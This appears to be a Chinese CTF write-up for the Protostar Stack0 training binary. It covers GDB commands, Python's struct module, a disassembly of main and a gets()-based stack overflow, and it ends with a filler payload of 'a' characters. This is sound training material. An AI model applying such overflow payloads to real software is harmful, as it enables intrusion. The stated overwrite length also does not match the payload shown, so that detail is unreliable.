Pwn系列之Protostar靶场 Stack0题解

前提学习

GDB反调试相关

设置反汇编代码格式为intel格式

 set disassembly-flavor intel

反汇编函数

disas/disass/disassemble 函数名/起始地址[,结束地址]

示例：

disass main

具体反汇编哪一个函数信息，可以使用objdump查看。一般__funcname是系统函数。

r 开始/重新执行 r 是 run的缩写
b设置断点 b

格式：b *内存地址

delete：删除所有断点

delete num：删除编号为num的断点 

info break：列出所有断点

ni 单步步过，相当于debug命令中的p
si 单步步入，相当于debug命令中的t
finish 执行到返回
display 显示某寄存器的值

格式：display /x $寄存器名字。例如：display /x $eax

x查看内存单元

格式：x  /nfu 内存地址 x means examine

       说明：

       n表示要显示的内存单元的个数

       f表示显示方式, 可取如下值：

       x 按十六进制格式显示变量。

       d 按十进制格式显示变量。

       u 按十进制格式显示无符号整型。

       o 按八进制格式显示变量。

       t 按二进制格式显示变量。

       a按十六进制格式显示变量。

       i 指令地址格式。

       c 按字符格式显示变量。

       s 按字符串格式显示变量。

       f 按浮点数格式显示变量。

       u表示一个地址单元的长度，其中：

       b表示单字节，

       h表示双字节，

       w表示四字节，

       g表示八字节。

p查看变量值

格式： p 变量名

如果要查看变量的地址，用p &变量名

struct模块

import  struct

# native byteorder

buffer  =  struct.pack( "ihb" ,  1 ,  2 ,  3 )

print  repr ( buffer )

print  struct.unpack( "ihb" ,  buffer )

# data from a sequence, network byteorder

data  =  [ 1 ,  2 ,  3 ]

buffer  =  struct.pack( "!ihb" ,  * data)

print  repr ( buffer )

print  struct.unpack( "!ihb" ,  buffer )

Output:

'\x01\x00\x00\x00\x02\x00\x03'

( 1 ,  2 ,  3 )

'\x00\x00\x00\x01\x00\x02\x03'

( 1 ,  2 ,  3 )

(gdb) disasse main

Dump of assembler code for function main:

0x080483f4 <main+0>:	push   ebp

0x080483f5 <main+1>:	mov    ebp,esp

0x080483f7 <main+3>:	and    esp,0xfffffff0

0x080483fa <main+6>:	sub    esp,0x60

0x080483fd <main+9>:	mov    DWORD PTR [esp+0x5c],0x0

0x08048405 <main+17>:	lea    eax,[esp+0x1c]

0x08048409 <main+21>:	mov    DWORD PTR [esp],eax

0x0804840c <main+24>:	call   0x804830c <gets@plt>

0x08048411 <main+29>:	mov    eax,DWORD PTR [esp+0x5c]

0x08048415 <main+33>:	test   eax,eax

0x08048417 <main+35>:	je     0x8048427 <main+51>

0x08048419 <main+37>:	mov    DWORD PTR [esp],0x8048500

0x08048420 <main+44>:	call   0x804832c <puts@plt>

0x08048425 <main+49>:	jmp    0x8048433 <main+63>

0x08048427 <main+51>:	mov    DWORD PTR [esp],0x8048529

0x0804842e <main+58>:	call   0x804832c <puts@plt>

0x08048433 <main+63>:	leave

0x08048434 <main+64>:	ret

End of assembler dump.

0x8048500:	 "you have changed the 'modified' variable"

0x8048529:	 "Try again?"

从反汇编的角度思考，就是要使得esp+0x5c的内存里存放的值不能为0。gets函数固有的漏洞就是栈溢出，那么用脏数据覆盖0x4c+0x4个字节，就可以实现数据修改。

payload: aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa

Pwn系列之Protostar靶场 Stack0题解的相关教程结束。